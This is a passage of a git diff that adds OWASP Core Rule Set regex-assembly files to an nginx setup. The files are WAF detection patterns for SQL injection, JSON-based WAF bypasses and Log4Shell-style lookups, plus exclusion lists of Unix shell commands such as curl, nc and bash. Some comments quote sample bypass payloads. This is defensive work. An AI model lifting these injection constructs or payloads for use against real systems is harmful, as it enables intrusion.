threshold + trigger + trusted + type + usage + user + view + work + workload + wrapper + xml\s*schema + xsrobject + ##!=> + \b + ##!=> + ##!< + + ##!> assemble + {{cmd_union}}\s* + ##!=> + all + select + distinct + ##!=> + \b + ##!=> + ##!< + ##!< +##!< diff --git a/nginx/config/owasp-crs/regex-assembly/942370.ra b/nginx/config/owasp-crs/regex-assembly/942370.ra new file mode 100644 index 00000000..e8253dc4 --- /dev/null +++ b/nginx/config/owasp-crs/regex-assembly/942370.ra @@ -0,0 +1,51 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##!+ i + +##! Helpers +##!> define quotes [\"'`] + +##!> assemble + or + xor + div + like + between + and + ##!=< operators +##!< + +##! Main assembly +##!> assemble + {{quotes}}\s*? + ##!=> + ##!> assemble + \*.+ + ##!=> + ##!> assemble + ##!> assemble + ##!=> operators + ##!< + id + ##!=> + ##!< + ##!=> + \W*?{{quotes}}\d + ##!=> + ##!< + [^\w\s?]+\s*?[^\w\s]+\s*?{{quotes}} + [^\w\s]+\s*?[\W\d].*?# + [^\w\s]+\s*?[\W\d].*?-- + ##!> assemble + ##!> assemble + ##!=> operators + ##!< + ##!=> + \s[^\d]+[\w-]+.*?\d + ##!< +##!< + +\^{{quotes}} +{{quotes}}.*?\*\s*?\d +[()\*<>%+-][\w-]+[^\w\s]+{{quotes}}[^,] diff --git a/nginx/config/owasp-crs/regex-assembly/942380.ra b/nginx/config/owasp-crs/regex-assembly/942380.ra new file mode 100644 index 00000000..7c435bce --- /dev/null +++ b/nginx/config/owasp-crs/regex-assembly/942380.ra @@ -0,0 +1,25 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##!+ i + +\bhaving\b\s+\d{1,10}\s*?[=<>] +\bhaving\b\s+'[^=]{1,10}'\s*?[=<>] +\bexecute\( +\bexecute\s{1,5}[\w\.$]{1,5}\s{0,3} +\bhaving\b ?\d{1,10} ?[=<>]+ +\bhaving\b ?[\'\"][^=]{1,10}[\'\" ?[=<>]+ +\bcreate\s+?table.{0,20}?\( +\blike\W*?char\W*?\( +select.*?case +from.*?limit +order\sby +exists\s\sselect +exists\sselect\Sif\s\( +exists\sselect\Sifnull\s\( +exists\sselect\Stop +exists\sselect\Sconcat +exists\ssystem\s\( +exists\s\bhaving\b\s+\d{1,10} +exists\s'[^=]{1,10}' +\bexists\s*?\(\s*?select\b diff --git a/nginx/config/owasp-crs/regex-assembly/942390.ra b/nginx/config/owasp-crs/regex-assembly/942390.ra new file mode 100644 index 00000000..b13dab49 --- /dev/null +++ b/nginx/config/owasp-crs/regex-assembly/942390.ra @@ -0,0 +1,17 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##!+ i + +\bor\b\s?\d{1,10}\s?[=<>]+ +\bor\b\s?[\'\"][^=]{1,10}[\'\"]\s?[=<>]+ +'\s+or\s+.{1,20}[+\-!<>=] +'\s+xor\s+.{1,20}[+\-!<>=] +\bor\b\s+\d{1,10} +\bor\b\s+'[^=]{1,10}' +\bxor\b\s+\d{1,10} +\bxor\b\s+'[^=]{1,10}' +\bor\b\s+\d{1,10}\s*?[=<>] +\bxor\b\s+\d{1,10}\s*?[=<>] +\bor\b\s+'[^=]{1,10}'\s*?[=<>] +\bxor\b\s+'[^=]{1,10}'\s*?[=<>] diff --git a/nginx/config/owasp-crs/regex-assembly/942400.ra b/nginx/config/owasp-crs/regex-assembly/942400.ra new file mode 100644 index 00000000..6852bcf8 --- /dev/null +++ b/nginx/config/owasp-crs/regex-assembly/942400.ra @@ -0,0 +1,9 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##!+ i + +\band\b\s+\d{1,10}\s*?[=<>] +\band\b\s+'[^=]{1,10}' +\band\b ?\d{1,10} ?[=<>]+ +\band\b ?[\'\"][^=]{1,10}[\'\"] ?[=<>]+ diff --git a/nginx/config/owasp-crs/regex-assembly/942410.ra b/nginx/config/owasp-crs/regex-assembly/942410.ra new file mode 100644 index 00000000..751d6252 --- /dev/null +++ b/nginx/config/owasp-crs/regex-assembly/942410.ra @@ -0,0 +1,246 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##!+ i +##!^ \b +##!$ \W*?\( + +abs +acos +adddate +addtime +aes_decrypt +aes_encrypt +asin +ascii +asciistr +atan +atan2 +avg +benchmark +bin +bin_to_num +bit_and +bit_count +bit_length +bit_or +bit_xor +cast +char +character_length +char_length +charset +chr +ciel +cieling +coalesce +coercibility +compress +concat +concat_ws +connection_id +conv +convert +convert_tz +cos +cot +count +cr32 +curdate +current_date +current_time +current_timestamp +current_user +curtime +database +date +date_add +datediff +date_format +date_sub +day +dayname +dayofmonth +dayofweek +dayofyear +dcount +decode +default +degrees +des_decrypt +des_encrypt +dump +elt +encode +encrypt +exp +export_set +extract +extractvalue +field +field_in_set +find_in_set +floor +format +found_rows +from_base64 +from_days +from_unixtime +get_format +get_lock +greatest +group_concat +hex +hextoraw +hour +if +ifnull +in +inet6_aton +inet6_ntoa +inet_aton +inet_ntoa +insert +instr +interval +is +is_free_lock +is_ipv4 +is_ipv4_compat +is_ipv4_mapped +is_ipv6 +is_not +is_not_null +isnull +is_null +is_used_lock +last +last_day +last_insert_id +lcase +least +left +length +ln +load_file +local +localtimestamp +locate +log +log10 +log2 +lower +lpad +ltrim +makedate +make_set +master_pos_wait +max +md5 +microsecond +mid +min +minute +mod +month +monthname +name_const +not_in +now +nullif +oct +octet_length +old_password +ord +password +period_add +period_diff +pg_sleep +pi +position +pow +power +procedure_analyse +quarter +quote +radians +rand +rawtohex +rawtonhex +rawtonhextoraw +release_lock +repeat +replace +reverse +right +round +row_count +rpad +rtrim +schema +second +sec_to_time +session_user +sha +sha1 +sha2 +sign +sin +sleep +soundex +space +sqrt +std +stddev +stddev_pop +stddev_samp +strcmp +str_to_date +subdate +substr +substring +substring_index +subtime +sum +sysdate +system_user +tan +time +timediff +time_format +timestamp +timestampadd +timestampdiff +time_to_sec +to_base64 +to_char +to_days +to_nchar +to_seconds +trim +truncate +ucase +uncompress +uncompressed_length +unhex +unix_timestamp +updatexml +upper +user +utc_date +utc_time +utc_timestamp +uuid +uuid_short +values +variance +var_pop +var_samp +version +week +weekday +weekofyear +weight_string +xmltype +year +yearweek diff --git a/nginx/config/owasp-crs/regex-assembly/942440-chain1.ra b/nginx/config/owasp-crs/regex-assembly/942440-chain1.ra new file mode 100644 index 00000000..1592b5b1 --- /dev/null +++ b/nginx/config/owasp-crs/regex-assembly/942440-chain1.ra @@ -0,0 +1,25 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! This chained rule is used to match on JWT base64-urlencoded tokens. +##! See https://www.rfc-editor.org/rfc/rfc4648#section-5 for details. + +##! JWTs consist of base64-urlencoded encoded JSON, and a JSON structure +##! just starts with '{"', which becomes 'ey' when encoded with a base64-urlencoded encoder. + +##!> define base64-urlencoded-charset [a-zA-Z0-9_-]+ +##!> define dot [.] + +##!^ ^ey + +{{base64-urlencoded-charset}} + +##!=> + +{{dot}}ey{{base64-urlencoded-charset}} + +##!=> + +{{dot}}{{base64-urlencoded-charset}} + +##!$ $ diff --git a/nginx/config/owasp-crs/regex-assembly/942440.ra b/nginx/config/owasp-crs/regex-assembly/942440.ra new file mode 100644 index 00000000..4d790510 --- /dev/null +++ b/nginx/config/owasp-crs/regex-assembly/942440.ra @@ -0,0 +1,10 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +/\*!? +\*/ +[';]-- +--\s +--[^-]*?- +[^&-]#.*?\s +;?\x00 diff --git a/nginx/config/owasp-crs/regex-assembly/942470.ra b/nginx/config/owasp-crs/regex-assembly/942470.ra new file mode 100644 index 00000000..e9f5f3b5 --- /dev/null +++ b/nginx/config/owasp-crs/regex-assembly/942470.ra @@ -0,0 +1,51 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##!+ i + +autonomous_transaction +current_user +dba_users +dbms_java +nvarchar +openowa_util +openquery +openrowset +sp_addextendedproc +sp_execute +sp_executesql +sp_help +sp_is_srvrolemember +sp_makewebtask +sp_oacreate +sp_password +sp_prepare +sp_replwritetovarbin +sp_sqlexec +sql_longvarchar +sql_variant +tbcreator +utl_file +utl_http +varchar +xp_availablemedia +xp_cmdshell +xp_dirtree +xp_enumdsn +xp_execresultset +xp_filelist +xp_loginconfig +xp_makecab +xp_ntsec +xp_ntsec_enumdomains +xp_regaddmultistring +xp_regdeletekey +xp_regdeletevalue +xp_regenumkeys +xp_regenumvalues +xp_regread +xp_regremovemultistring +xp_regwrite +xp_servicecontrol +xp_terminate +xp_terminate_process diff --git a/nginx/config/owasp-crs/regex-assembly/942480.ra b/nginx/config/owasp-crs/regex-assembly/942480.ra new file mode 100644 index 00000000..77655c6e --- /dev/null +++ b/nginx/config/owasp-crs/regex-assembly/942480.ra @@ -0,0 +1,35 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##!+ i + +\bdbms_\w+\.\b +\bdelete\b\W*?\bfrom\b +\bgroup\b.*?\bby\b.{1,100}?\bhaving\b +\binner\b\W*?\bjoin\b +\binsert\b\W*?\binto\b +\binto\b\W*?\bdumpfile\b +\binto\b\W*?\boutfile\b +\bload\b\W*?\bdata\b.*?\binfile\b +\boverlay\b\W*?\(.*?\b\W*?placing\b +\bprint\b\W*?\@\@ +\bselect\b.{1,100}?\b.*?\bdump\b.*\bfrom\b +\bselect\b.{1,100}?\bcount\b.{1,100}?\bfrom\b +\bselect\b.{1,100}?\bdata_type\b +\bselect\b.{1,100}?\bfrom\b.{1,100}?\bwhere\b +\bselect\b.{1,100}?\binstr\b +\bselect\b.{1,100}?\blength\b.{1,100}?\bfrom\b +\bselect\b.{1,100}?\bto_char\b +\bselect\b.{1,100}?\bto_number\b +\bselect\b.{1,100}?\btop\b.{1,100}?\bfrom\b +\bsys_context\b +\bunion\b.{1,100}?\bselect\b +\butl_inaddr\b +collation\W*?\(a\b +'dbo' +'msdasql' +'sa' +'sqloledb' +\@\@version\b +;\W*?\bdrop\b +;\W*?\bshutdown\b diff --git a/nginx/config/owasp-crs/regex-assembly/942520.ra b/nginx/config/owasp-crs/regex-assembly/942520.ra new file mode 100644 index 00000000..05ae95b3 --- /dev/null +++ b/nginx/config/owasp-crs/regex-assembly/942520.ra @@ -0,0 +1,18 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##!+ i + + +##!^ [\"'`]\s*? + +##! All tests below are prefixed with [\"'`]\s*? + +is\s+not\b +##! all sqlite not smth from https://www.sqlite.org/lang_expr.html +not\s+(?:like|glob|between|null|in|regexp|match)\b +##! sql operators +[|&<>*\/%=^+-] +##! common operators that can't be added to 942120.data +(?:mod|div)\b +sounds\s+like\b diff --git a/nginx/config/owasp-crs/regex-assembly/942521.ra b/nginx/config/owasp-crs/regex-assembly/942521.ra new file mode 100644 index 00000000..de2ab196 --- /dev/null +++ b/nginx/config/owasp-crs/regex-assembly/942521.ra @@ -0,0 +1,10 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##!^ ^ +##!+ i + +##! Regex for detecting first word after an odd number of quotes +[^']*?(?:'[^']*?'[^']*?)*?'\s*(\w+)\b +[^\"]*?(?:\"[^\"]*?\"[^\"]*?)*?\"\s*(\w+)\b +[^`]*?(?:`[^`]*?`[^`]*?)*?`\s*(\w+)\b diff --git a/nginx/config/owasp-crs/regex-assembly/942540.ra b/nginx/config/owasp-crs/regex-assembly/942540.ra new file mode 100644 index 00000000..248fdfcc --- /dev/null +++ b/nginx/config/owasp-crs/regex-assembly/942540.ra @@ -0,0 +1,8 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! These expressions look for an ending '; pattern, but won't match if the quotes +##! are balanced. +^[^']*'\s*; +^[^"]*"\s*; +^[^`]*`\s*; diff --git a/nginx/config/owasp-crs/regex-assembly/942550.ra b/nginx/config/owasp-crs/regex-assembly/942550.ra new file mode 100644 index 00000000..bf65e63c --- /dev/null +++ b/nginx/config/owasp-crs/regex-assembly/942550.ra @@ -0,0 +1,30 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! Referring to https://claroty.com/team82/research/js-on-security-off-abusing-json-based-sql-to-bypass-waf +##! this rule tries to match the following payloads: +##! +##! PostgreSQL: '{"b":2}'::jsonb <@ '{"a":1, "b":2}'::jsonb +##! PostgreSQL: '{"b":2}'::jsonb @> '{"a":1, "b":2}'::jsonb +##! PostgreSQL: '{"b":2}'::jsonb @ '{"a":1, "b":2}'::jsonb +##! PostgreSQL: '{"b":2}'::jsonb < '{"a":1, "b":2}'::jsonb +##! PostgreSQL: '{"b":2}'::jsonb > '{"a":1, "b":2}'::jsonb +##! SQLite: '{"a":2,"c":[4,5,{"f":7}]}' -> '$.c[2].f' = 7 +##! SQLite: '{"a":2,"c":[4,5,{"f":7}]}' <- '$.c[2].f' = 7 +##! SQLite: '{"a":2,"c":[4,5,{"f":7}]}' < '$.c[2].f' = 7 +##! SQLite: '{"a":2,"c":[4,5,{"f":7}]}' > '$.c[2].f' = 7 +##! MySQL: JSON_EXTRACT('{"id": 14, "name": "Aztalan"}', '$.name') = 'Aztalan' + +##!> define quotes [\"'`] +##!> define operators (?:@>|<@|\?|\?\||\?&|#>|#>>|->>|<|>|->|<-) +##!> define json_ending_brackets [\]\}] +##!> define json_starting_brackets [\[\{] + +##!> assemble + ##! https://regex101.com/r/mzG5Fg/1 + {{quotes}}{{json_starting_brackets}}.*{{json_ending_brackets}}{{quotes}}.*(::.*jsonb?)?.*{{operators}} + {{operators}}{{quotes}}{{json_starting_brackets}}.*{{json_ending_brackets}}{{quotes}} + + ##! example: SELECT id FROM users WHERE id=JsoN_EXTraCT/**/(/**/' {"a":1} '/**/,/**/' $.a '/**/); + json_extract.*\(.*\) +##!< diff --git a/nginx/config/owasp-crs/regex-assembly/942560.ra b/nginx/config/owasp-crs/regex-assembly/942560.ra new file mode 100644 index 00000000..cb40cfa9 --- /dev/null +++ b/nginx/config/owasp-crs/regex-assembly/942560.ra @@ -0,0 +1,8 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##!+ i + +1\.e, +1\.e\( +1\.e\) diff --git a/nginx/config/owasp-crs/regex-assembly/944150.ra b/nginx/config/owasp-crs/regex-assembly/944150.ra new file mode 100644 index 00000000..523aebf5 --- /dev/null +++ b/nginx/config/owasp-crs/regex-assembly/944150.ra @@ -0,0 +1,23 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! The following is an expansion of +##! (?:\${[^}]{0,15}\${|\${(?:jndi|ctx)) +##! where every character also matches the equivalent named HTML entity. +##! It is a workaround for the shortcomings of `htmlEntityDecode`, which +##! handles numerical HTML entities well but only handles 5 named +##! entities. The official list of named entities can be found here: +##! https://html.spec.whatwg.org/multipage/named-characters.html. +##! +##! Note: +##! - We don't match `}` or `}` because it would enable more +##! evasions while also increasing the number of potential false positives. +##! The risk of false negatives in this case is acceptable. +##! - Omitting the terminating semi-colon can be used as an evasion with lenient +##! parsers. We catch those by making the semi-colon optional. + + +##!+ i + +(?:\$|$?)(?:\{|&(?:lbrace|lcub);?)[^}]{0,15}(?:\$|$?)(?:\{|&(?:lbrace|lcub);?) +(?:\$|$?)(?:\{|&(?:lbrace|lcub);?)(?:jndi|ctx) diff --git a/nginx/config/owasp-crs/regex-assembly/944151.ra b/nginx/config/owasp-crs/regex-assembly/944151.ra new file mode 100644 index 00000000..a8174bac --- /dev/null +++ b/nginx/config/owasp-crs/regex-assembly/944151.ra @@ -0,0 +1,22 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! The following is an expansion of +##! (?:\$\{[^}]*\$\{|\$\{(?:jndi|ctx)) +##! where every character also matches the equivalent named HTML entity. +##! It is a workaround for the shortcomings of `htmlEntityDecode`, which +##! handles numerical HTML entities well but only handles 5 named +##! entities. The official list of named entities can be found here: +##! https://html.spec.whatwg.org/multipage/named-characters.html. +##! +##! Note: +##! - We don't match `}` or `}` because it would enable more +##! evasions while also increasing the number of potential false positives. +##! The risk of false negatives in this case is acceptable. +##! - Omitting the terminating semi-colon can be used as an evasion with lenient +##! parsers. We catch those by making the semi-colon optional. + +##!+ i + +(?:\$|$?)(?:\{|&(?:lbrace|lcub);?)[^}]*(?:\$|$?)(?:\{|&(?:lbrace|lcub);?) +(?:\$|$?)(?:\{|&(?:lbrace|lcub);?)(?:jndi|ctx) diff --git a/nginx/config/owasp-crs/regex-assembly/944152.ra b/nginx/config/owasp-crs/regex-assembly/944152.ra new file mode 100644 index 00000000..158445de --- /dev/null +++ b/nginx/config/owasp-crs/regex-assembly/944152.ra @@ -0,0 +1,18 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! The following is an expansion of +##! (?:\${[^}]{0,15}\${|\${(?:jndi|ctx)) +##! where every character also matches the equivalent named HTML entity. +##! It is a workaround for the shortcomings of `htmlEntityDecode`, which +##! handles numerical HTML entities well but only handles 5 named +##! entities. The official list of named entities can be found here: +##! https://html.spec.whatwg.org/multipage/named-characters.html. +##! +##! - Omitting the terminating semi-colon can be used as an evasion with lenient +##! parsers. We catch those by making the semi-colon optional. + + +##!+ i + +(?:\$|$?)(?:\{|&(?:lbrace|lcub);?) diff --git a/nginx/config/owasp-crs/regex-assembly/951230.ra b/nginx/config/owasp-crs/regex-assembly/951230.ra new file mode 100644 index 00000000..a96b6f9c --- /dev/null +++ b/nginx/config/owasp-crs/regex-assembly/951230.ra @@ -0,0 +1,22 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##!+ i + +supplied argument is not a valid MySQL +Column count doesn't match value count at row +mysql_fetch_array\(\) +on MySQL result index +You have an error in your SQL syntax; +You have an error in your SQL syntax near +MySQL server version for the right syntax to use +\[MySQL\]\[ODBC +Column count doesn't match +Table '[^']+' doesn't exist +SQL syntax.*MySQL +##! Because of the bug in RE2 (golang), we cannot use {0,n} (a range started at 0), so it was replaced with (?:...{1,n})? +Warning.{1,10}mysql_(?:[a-z_()]{1,26})? +valid MySQL result +MySqlClient\. +ERROR [0-9]{4} \([a-z0-9]{5}\): +XPATH syntax error: diff --git a/nginx/config/owasp-crs/regex-assembly/951240.ra b/nginx/config/owasp-crs/regex-assembly/951240.ra new file mode 100644 index 00000000..7be6aa13 --- /dev/null +++ b/nginx/config/owasp-crs/regex-assembly/951240.ra @@ -0,0 +1,17 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##!+ i + +PostgreSQL query failed: +pg_query\(\) \[: +pg_exec\(\) \[: +PostgreSQL.{1,20}ERROR +##! Example match: Warning: pg_fetch_array(): 3 is not a valid PostgreSQL result resource +Warning.{1,20}\bpg_.* +valid PostgreSQL result +Npgsql\. +PG::[a-z]*Error +Supplied argument is not a valid PostgreSQL .*? resource +Unable to connect to PostgreSQL server +invalid input syntax for integer diff --git a/nginx/config/owasp-crs/regex-assembly/exclude/unix-shell-fps-pl1.ra b/nginx/config/owasp-crs/regex-assembly/exclude/unix-shell-fps-pl1.ra new file mode 100644 index 00000000..a38db686 --- /dev/null +++ b/nginx/config/owasp-crs/regex-assembly/exclude/unix-shell-fps-pl1.ra @@ -0,0 +1,820 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! This list excludes command words that are prone to cause false +##! positives from the following include files: +##! - unix-shell-upto3.ra and +##! - unix-shell-4andup.ra + +##! To reduce complexity, this file simply lists all possible +##! variants of a word, so when a word would be changed from, e.g., +##! `awk@` to `awk~`, this list would not have to be updated. + +##! To automatically add exclusions for English words from the sources, run the following: +##! NL=$'\n' +##! original="$(grep -vE '^[#$]' regex-assembly/exclude/unix-shell-fps-pl1.ra)" +##! upto3="$(grep -vE '^[#$]' regex-assembly/include/unix-shell-upto3.ra)" +##! rest="$(grep -vE '^[#$]' regex-assembly/include/unix-shell-4andup.ra)" +##! english_upto3="$(util/fp-finder/spell.sh -m -e regex-assembly/include/unix-shell-upto3.ra)" +##! # strip suffixes from words so that spell.sh works +##! english_rest="$(util/fp-finder/spell.sh -m -e -s '[@~]' regex-assembly/include/unix-shell-4andup.ra)" +##! result="" +##! function update_existing { +##! if [ -z "${1}" ]; then +##! return +##! fi +##! while read -r oword; do +##! found=0 +##! while read -r eword; do +##! if grep -qE "^${eword}[@~]?" <<<"${oword}"; then +##! result="${result}${eword}${NL}" +##! result="${result}${eword}@${NL}" +##! result="${result}${eword}~${NL}" +##! found=1 +##! break +##! fi +##! done <<<"${1}" +##! if [ ${found} -eq 0 ]; then +##! result="${result}${oword}${NL}" +##! fi +##! done <<<"${original}" +##! } +##! function add_new { +##! if [ -z "${1}" ]; then +##! return +##! fi +##! while read -r eword; do +##! if ! grep -qE "^${eword}[@~]?" <<<"${original}"; then +##! result="${result}${eword}${NL}" +##! result="${result}${eword}@${NL}" +##! result="${result}${eword}~${NL}" +##! fi +##! done <<<"${1}" +##! } +##! update_existing "${english_upto3}" +##! update_existing "${english_rest}" +##! add_new "${english_upto3}" +##! add_new "${english_rest}" + +##! body_start=$(grep -n -E -m 1 '^[^#$]' regex-assembly/exclude/unix-shell-fps-pl1.ra | cut -d: -f1) +##! ed -s regex-assembly/exclude/unix-shell-fps-pl1.ra <> regex-assembly/exclude/unix-shell-fps-pl1.ra + +GET +GET@ +GET~ +HEAD +HEAD@ +HEAD~ +POST +POST@ +POST~ +ab +ab@ +ab~ +adduser +agetty +alias +alias@ +alias~ +alpine +alpine@ +alpine~ +ansible-playbook +apt +apt-get +apt@ +aptitude +aptitude@ +aptitude~ +apt~ +ar +ar@ +arch +arch@ +arch~ +aria2c +arj +arp +arp@ +arp~ +ar~ +as +as@ +ascii-xfr +ascii85 +ash +ash@ +ash~ +aspell +as~ +at +at@ +atobm +at~ +awk +awk@ +aws +aws@ +basename +basename@ +basename~ +bash +bash@ +bash~ +batch +batch@ +batch~ +bpftrace +breaksw +bridge +bridge@ +bridge~ +bundler@ +busctl +byebug +c89 +c99 +cancel +cancel@ +cancel~ +capsh@ +cat +cat@ +cat~ +cc +cc@ +cc~ +certbot +chattr +chdir@ +check_by_ssh +check_cups +check_log +check_memory +check_raid +check_ssl_cert +check_statusfile +chflags +chmod +choom +chown +chroot +chroot@ +chroot~ +clang +clang@ +clang~ +cmp +cobc +column +column@ +column~ +comm +command +command@ +command~ +composer +composer@ +composer~ +compress +compress@ +compress~ +cowsay +cowthink +cp +cp@ +cpan +cpio +cpulimit +crash +crash@ +crash~ +crontab +csplit +csvtool +cupsfilter +curl +curl@ +curl~ +cut +cut@ +cut~ +dash +dash@ +dash~ +date +date@ +date~ +dd +dd@ +dd~ +dhclient +dialog +dialog@ +dialog~ +dig +dig@ +dig~ +dir +dir@ +dir~ +dmidecode +dmsetup +dnf +docker +docker@ +docker~ +done +done@ +done~ +dosbox +dpkg +du +du@ +dvips +easy_install +eb +eb@ +eb~ +echo +echo@ +echo~ +ed +ed@ +ed~ +efax +emacs +endif +endsw +env-update +eqn +es +es@ +esac +es~ +eval +eval@ +eval~ +ex +ex@ +exec +exec@ +exec~ +exiftool +expand +expand@ +expand~ +expect +expect@ +expect~ +export +export@ +export~ +expr +ex~ +facter +fc +fc@ +fetch +fetch@ +fetch~ +fi +fi@ +file +file@ +file~ +find +find@ +find~ +finger +finger@ +finger~ +fish +fish@ +fish~ +fi~ +flock +flock@ +flock~ +fmt +fold +fold@ +fold~ +foreach +fping +ftp +ftp@ +ftp~ +function +function@ +function~ +gawk +gawk@ +gawk~ +gcore +gdb +gem +gem@ +gem~ +genie +genie@ +genie~ +genisoimage +getfacl@ +ghc +ghci +gimp +gimp@ +gimp~ +ginsh +git +git@ +git~ +go +go@ +go~ +grc +group +group@ +group~ +gtester +hash +hash@ +hash~ +hd +hd@ +head +head@ +head~ +hexdump +highlight +highlight@ +highlight~ +history +history@ +history~ +hostid +hostname +hping3 +htdigest +htpasswd +iconv +id +id@ +id~ +ifconfig +iftop +install +install@ +install~ +ionice +ip +ip6tables +ip@ +ipconfig +iptables +ip~ +ispell +java +java@ +java~ +jexec +jjs +jobs +jobs@ +jobs~ +join +join@ +join~ +journalctl +jq +jrunscript +kill +kill@ +killall +kill~ +knife +knife@ +knife~ +ksshell +last +last@ +last~ +latex +latex@ +latex~ +ld +ld@ +ldconfig +ldd +ldd@ +less +less@ +less~ +links +links@ +links~ +ln +ln@ +local +local@ +local~ +locate +locate@ +locate~ +loginctl +logname +logsave +look +look@ +look~ +lp +lp@ +lp~ +lshw +ltrace +lua +lua@ +lualatex +luatex +lwp-dump +lwp-mirror +lwp-request +lynx +lynx@ +lynx~ +mail +mail@ +mailx@ +mail~ +make +make@ +make~ +man +man@ +man~ +mawk +mkdir@ +more +more@ +more~ +mosquitto +mount +mount@ +mount~ +msgattrib +msgcat +msgconv +msgfilter +msgmerge +msguniq +mtr +mutt +mutt@ +mutt~ +mv +mv@ +mv~ +mysql +nano@ +nasm +nawk +nc +nc@ +nc~ +neofetch +net +net@ +net~ +nice +nice@ +nice~ +nl +nl@ +nm +nm@ +nmap +nm~ +node +node@ +node~ +npm +npm@ +nroff +nsenter +nslookup +null +null@ +null~ +octave +octave@ +octave~ +od +od@ +od~ +openssl +openvpn +openvt +opkg +pacman@ +parted +parted@ +parted~ +passwd +paste +paste@ +paste~ +patch +patch@ +patch~ +pax +pax@ +pax~ +pdb +pdflatex +pdftex +perf +perlsh +perms +perms@ +perms~ +pf +pf@ +pg +pic +pic@ +pico@ +pic~ +pidstat +ping +ping@ +ping~ +pip +pip@ +pip~ +pkg +pkg_info +pkginfo +pr +pr@ +pry +pry@ +pry~ +pr~ +ps +ps@ +psftp +psql +ps~ +ptx +puppet +puppet@ +puppet~ +pushd +python +python@ +python~ +rake +rake@ +rake~ +raku +rar +rar@ +readelf +red +red@ +redcarpet@ +red~ +rename +rename@ +rename~ +repeat +repeat@ +repeat~ +replace +replace@ +replace~ +restic +rev +rev@ +rev~ +rlogin +rlwrap +rm +rm@ +route +route@ +route~ +rpm +rpm@ +rpmdb +rpmquery +rpmverify +rpm~ +ruby +ruby@ +ruby~ +run-mailcap +run-parts +rview +rvim +sash +sash@ +sash~ +sched +sched@ +sched~ +screen +screen@ +screen~ +script +script@ +script~ +self +self@ +self~ +service +service@ +service~ +set +set@ +setarch +setfacl@ +set~ +sg +sg@ +sg~ +shadow +shadow@ +shadow~ +shells +shells@ +shells~ +shuf +shutdown +shutdown@ +shutdown~ +sleep +sleep@ +sleep~ +slsh +smbclient +snap +snap@ +snap~ +soelim +sort +sort@ +sort~ +source +source@ +source~ +split +split@ +split~ +sqlite3 +ss +ss@ +ssh-keygen +ssh-keyscan +sshpass +ss~ +start-stop-daemon +stdbuf +strace +strings +strings@ +strings~ +su +su@ +systemctl +systemd-resolve +tac +tail +tail@ +tail~ +tar +tar@ +tar~ +task +task@ +taskset +task~ +tbl +tclsh +tcp +tcp@ +tcpdump +tcp~ +tee +tee@ +tee~ +tex +tex@ +tex~ +tftp +tic +tic@ +tic~ +time +time@ +timedatectl +time~ +tmux +top +top@ +top~ +touch +touch@ +touch~ +troff +tshark +ul +ul@ +ulimit@ +uncompress +uncompress@ +uncompress~ +unexpand +uniq +unlink +unlink@ +unlink~ +unset +unset@ +unset~ +unshare@ +unzip +unzip@ +unzip~ +up2date@ +update-alternatives +uudecode +uuencode +valgrind +vi +vi@ +view +view@ +view~ +vim +vim@ +vimdiff +vim~ +virsh +vi~ +volatility +volatility@ +volatility~ +w +w@ +wall +wall@ +wall~ +watch +watch@ +watch~ +wc +whiptail +whiptail@ +whiptail~ +who +who@ +whois +who~ +wireshark +wish +wish@ +wish~ +w~ +xelatex +xetex +xmodmap +xmore +xpad +xterm +xxd +yarn +yarn@ +yarn~ +yelp +yelp@ +yelp~ +yes +yes@ +yes~ +yum +zathura +zero +zero@ +zero~ +zip +zip@ +zip~ +zsoelim +zypper diff --git a/nginx/config/owasp-crs/regex-assembly/exclude/unix-shell-fps-pl2.ra b/nginx/config/owasp-crs/regex-assembly/exclude/unix-shell-fps-pl2.ra new file mode 100644 index 00000000..50d80c74 --- /dev/null +++ b/nginx/config/owasp-crs/regex-assembly/exclude/unix-shell-fps-pl2.ra @@ -0,0 +1,37 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! This list excludes command words that are prone to cause false +##! positives from the following include files: +##! - unix-shell-upto3.ra +##! - unix-shell-4andup.ra + +##! To reduce complexity, this file simply lists all possible +##! variants of a word, so when a word would be changed from, e.g., +##! `awk@` to `awk~`, this list would not have to be updated. +##! See also unix-shell-fps-pl1.ra. + +aptitude +aptitude@ +aptitude~ +dnf +dnf@ +dnf~ +pacman +pacman@ +pacman~ +ps +ps@ +ps~ +up2date +up2date@ +up2date~ +vi +vi@ +vi~ +who +who@ +who~ +w +w@ +w~ diff --git a/nginx/config/owasp-crs/regex-assembly/exclude/unix-shell-fps-useragents.ra b/nginx/config/owasp-crs/regex-assembly/exclude/unix-shell-fps-useragents.ra new file mode 100644 index 00000000..9cbd3f55 --- /dev/null +++ b/nginx/config/owasp-crs/regex-assembly/exclude/unix-shell-fps-useragents.ra @@ -0,0 +1,47 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! This list excludes command words that are prone to cause false +##! positives from the following include files: +##! +##! - unix-shell-upto3.ra +##! - unix-shell-4andup.ra +##! - 